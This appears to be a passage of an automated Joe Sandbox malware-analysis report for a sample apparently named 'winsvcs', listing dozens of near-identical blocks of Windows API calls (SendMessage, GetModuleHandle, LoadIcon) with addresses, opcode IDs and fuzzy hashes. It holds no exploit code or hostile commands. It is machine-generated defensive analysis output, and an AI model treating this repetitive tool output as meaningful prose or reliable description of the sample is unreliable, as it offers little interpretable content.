                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 3564a5d73e1706a2e47389451b451b82d68f2e53e33bc62a888cbd7b9e42f6c8
                                                                                                                                                                                                                          • Instruction ID: 429cbd9149b55361b38364805ecf70f412a373ee621004217eed38f5c464dd76
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3564a5d73e1706a2e47389451b451b82d68f2e53e33bc62a888cbd7b9e42f6c8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5BE042B1289614BAF65117B05C4EFFA362DAB14B02F106420F792E91D0CAF96C428B7D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040FA07
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040FA17
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040FA1F
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040FA2B
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040FA3A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 473b36df6f541bac8f595ccec7626f63c455e785c2d2d26d970966f2bfed7243
                                                                                                                                                                                                                          • Instruction ID: c72f6ad03f353f561a99e758367ef941d0c916186b8f8285fa4e34984247ba56
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 473b36df6f541bac8f595ccec7626f63c455e785c2d2d26d970966f2bfed7243
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31E042B1289614BAF65117B05C4EFFA362DAB14B02F106520F792E91D0CAF86C428B7D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F5A0
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F5B0
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F5B8
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F5C4
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F5D3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 58b99a24e225a215ec34d596c55b6635080be227acbca1fc0d235df464515e15
                                                                                                                                                                                                                          • Instruction ID: b6dd8b5b4e134736a0db0f6dc2b81ca2b1be5616f72a07522d348ec5361ba80b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58b99a24e225a215ec34d596c55b6635080be227acbca1fc0d235df464515e15
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0DE042B1289614BAF65117B05C4EFFA362DAB14B02F106421F792E95D0CAF86C428B7D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F9BF
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F9CF
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F9D7
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F9E3
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F9F2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: a42f5618b02dae5d81ff95cfd2331ef9782f7e5d76c9f1b005de485939b283e8
                                                                                                                                                                                                                          • Instruction ID: d34a4e6785fcd5d8804060be10e08f5a13504dab63f5c32d185528fae42e6cbc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a42f5618b02dae5d81ff95cfd2331ef9782f7e5d76c9f1b005de485939b283e8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C5E042B1689614BAF65117B05C4EFFA362DAB14B02F106420F792E91D0CAF86C428B7D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040FA4F
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040FA5F
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040FA67
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040FA73
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040FA82
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: efd2d74d83d920622d9b4420b2c5048c228e871b5561e64fec3fc43d6029cf99
                                                                                                                                                                                                                          • Instruction ID: b7b077b0efbaa99d57c9e01e78f00ef8fa4a74ec0cbc48e40112d5a6e4ee9a6e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: efd2d74d83d920622d9b4420b2c5048c228e871b5561e64fec3fc43d6029cf99
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47E04CB12883047AF65017B05C4EFB6352DA714B01F106820B792E91D1CAF85C42473D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000172), ref: 0040F288
                                                                                                                                                                                                                          • SendMessageA.USER32(C033FFFF,00000080,00000001,00000000), ref: 0040F298
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000172), ref: 0040F2A0
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F2AC
                                                                                                                                                                                                                          • SendMessageA.USER32(C033FFFF,00000080,00000000,00000000), ref: 0040F2BB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 93641fda4ea1c190c8fdc1416690265742e14c0d61ff617a7b54e2bac03fb871
                                                                                                                                                                                                                          • Instruction ID: d99028b12e30fd3fe39ac89642547f447b9f6d686350d1e6dd1f500a3f642d4a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 93641fda4ea1c190c8fdc1416690265742e14c0d61ff617a7b54e2bac03fb871
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6E0ECB12887107BF65017A05C4EFEA352CAB14B01F105120F792AA1D0CAF85C42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F2D0
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F2E0
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F2E8
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F2F4
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F303
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: b31f41dcf38431eb20b47a1d01738ebdc9c6014de1d4b334c6a8ea233e26116d
                                                                                                                                                                                                                          • Instruction ID: 6d76136d54f134a665c01184275cec0f141023eb7b6fb85ea418c97ed7197620
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b31f41dcf38431eb20b47a1d01738ebdc9c6014de1d4b334c6a8ea233e26116d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DCE04CB12883047BF65017B05C4EFB6362DA714B01F106420B792E91D1CAF85C42473D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040FADF
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040FAEF
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040FAF7
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040FB03
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040FB12
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: e5b006b71caa7b31b3e4d514c68d06393cd2a06c7708e93191fda2f6d2418eba
                                                                                                                                                                                                                          • Instruction ID: b992e7cc074c589086062039aad7a199eea489cb61b4551384fa19084778ec30
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5b006b71caa7b31b3e4d514c68d06393cd2a06c7708e93191fda2f6d2418eba
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EEE04C712896147AF65117B05C4EFFA352DAB14B02F105520F796E91D0CAF85D42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F6E3
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F6F3
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F6FB
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F707
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F716
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 23d34bf04866c5ae9d00e95c9030021b5f300522d807fc47d3c1f454d20da297
                                                                                                                                                                                                                          • Instruction ID: 3e28eb3131572d2fac298909779aa96aa2a87ebeacc2675cd42585d1acf75fde
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 23d34bf04866c5ae9d00e95c9030021b5f300522d807fc47d3c1f454d20da297
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CEE04C716896147AF65117B05C4EFFA352DAB14B01F109420F792E91D0DAF86C42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040FA97
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040FAA7
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040FAAF
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040FABB
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040FACA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 6b3226776a5742b27fbb979d904a7470388a7b538000b63b34d878ba3ff64aa0
                                                                                                                                                                                                                          • Instruction ID: 1d36f7c1484a4d98f76bcf46e8ebade4d22d25235dcfb774b2c89be6bd50a90d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b3226776a5742b27fbb979d904a7470388a7b538000b63b34d878ba3ff64aa0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3E0EC712886007AF65017B05C0EFFA352CAB14B02F105420F792E90D0CAF85C42473D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F69B
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F6AB
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F6B3
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F6BF
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F6CE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 1df19ddf3821a151879fa176db2f2840e5e50782decf33660897cd00c31d8261
                                                                                                                                                                                                                          • Instruction ID: c4bcc1e1c1be38c76109329eba7caa4c6fa0630b5fa9804ec52db424150adb96
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1df19ddf3821a151879fa176db2f2840e5e50782decf33660897cd00c31d8261
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36E042B1289614BAF65117B05C4EFFA362DAB14B02F10A420F792E91D0CAF86C468B7D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F360
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F370
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F378
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F384
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F393
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 34a7cfb35cefde2ddd2ec6d40638f8d98ca118db87320b005e42d95ebf97a8be
                                                                                                                                                                                                                          • Instruction ID: f7383a7ab23df242e51286724413437d4e223c1a3943708dcd5a078a45c667a9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 34a7cfb35cefde2ddd2ec6d40638f8d98ca118db87320b005e42d95ebf97a8be
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64E042B1288304BAF65117B06C4EFBA362DA714F02F106524F792E91D0CAF96C529B3E
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040FB6F
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040FB7F
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040FB87
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040FB93
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040FBA2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: a1636c61c8cbb0665695d0440f991a4229b6176894076ef849f9fa76ba953181
                                                                                                                                                                                                                          • Instruction ID: 4017f48e94712bf2f969ea7e51899ef551f7e2015cd638675003ecdf66d8c9fa
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1636c61c8cbb0665695d0440f991a4229b6176894076ef849f9fa76ba953181
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4BE04C712896147AF65117B05C4EFFA352DAB14B01F105420F792E91D0CAF85C42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F773
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F783
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F78B
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F797
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F7A6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 4dc3a8707538aa1bd6e265054b12e56723896eeed88543bbfb4ce09428766a02
                                                                                                                                                                                                                          • Instruction ID: 71a0b32a7878cc80f8160acc97d736f4d43d5bc296ae39aaeaecc328a0f48766
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4dc3a8707538aa1bd6e265054b12e56723896eeed88543bbfb4ce09428766a02
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51E04C716897147AF65117B05C4EFFA352DAB14B01F105520F792E91D0CAF86C42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F318
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F328
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F330
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F33C
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F34B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 145af19c4a3d465d9ff42e3dc6b765607c6eb6348d29c9401d67edf403f9197c
                                                                                                                                                                                                                          • Instruction ID: 334fcfc35a5dd8afaa864d8e0f73d07486cccace6e0d136221b9713eec3d01bf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 145af19c4a3d465d9ff42e3dc6b765607c6eb6348d29c9401d67edf403f9197c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EBE042B1289714BAF65117B05C4EFFA362DAB14B02F106420F792E91D0CAF96C428B7E
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040FB27
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040FB37
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040FB3F
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040FB4B
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040FB5A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 05e68aaf83bba0886d3b98f546a04423c6a9d44d9e403c0ac7e3a688c7bd9e88
                                                                                                                                                                                                                          • Instruction ID: 0b98619118816d2a2a2b8005e09654c782942d7a3eccd87f9c26c283519b54bc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05e68aaf83bba0886d3b98f546a04423c6a9d44d9e403c0ac7e3a688c7bd9e88
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4DE04C712896147AF65117B05C4EFFA352DAB14B02F105420F792E91D0CAF95D424B7D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F72B
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F73B
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F743
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F74F
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F75E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 431d2f6382f22f1c527d9f63ec14534cbdb325eac1115864a4e71dff3750b3ed
                                                                                                                                                                                                                          • Instruction ID: b83773e1df3edd97bc25a0b786c3283d31d19127a53598c0ef36f1eb61ead98d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 431d2f6382f22f1c527d9f63ec14534cbdb325eac1115864a4e71dff3750b3ed
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37E04C716896147AF65117B05C4EFFA352DAB14B01F105420F792E91D0CAF86C42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F3F0
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F400
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F408
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F414
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F423
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: ffba4c012e2a4b0f6acf445ca24378fc798d4f7e951ca50223e0f86f292853c8
                                                                                                                                                                                                                          • Instruction ID: 2b10cc25e026ddcf9697d52d97dd030663e87e79539ddb17dd0f1381a82fdc3c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ffba4c012e2a4b0f6acf445ca24378fc798d4f7e951ca50223e0f86f292853c8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C3E04CB1288304BAF65017B05C4EFB6352DA714B01F106520B792E91D1CAF85C42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F803
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F813
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F81B
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F827
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F836
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
